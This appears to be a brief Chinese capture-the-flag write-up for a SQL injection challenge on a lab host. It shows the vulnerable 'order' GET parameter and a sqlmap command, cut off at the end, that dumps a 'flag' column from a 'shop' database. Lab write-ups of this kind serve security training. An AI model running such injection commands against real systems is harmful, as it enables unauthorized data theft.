前言
题目分类:
CTF—Web—SQL注入—02—sqlmap常规模式
一、题目描述
题目:sql注入
链接:192.168.87.184
提示:order
二、解题步骤
1、id查询
Step1:根据id查询一下,url变成了
http://192.168.87.184/?order=id&button=submit
由链接可知,此为get传参。
2、sqlmap跑URL
Step2:利用kali中的sqlmap直接跑,就可以得到flag。
sqlmap -u "http://192.168.87.184/?order=id&button=submit" -D shop -T flag -C flag –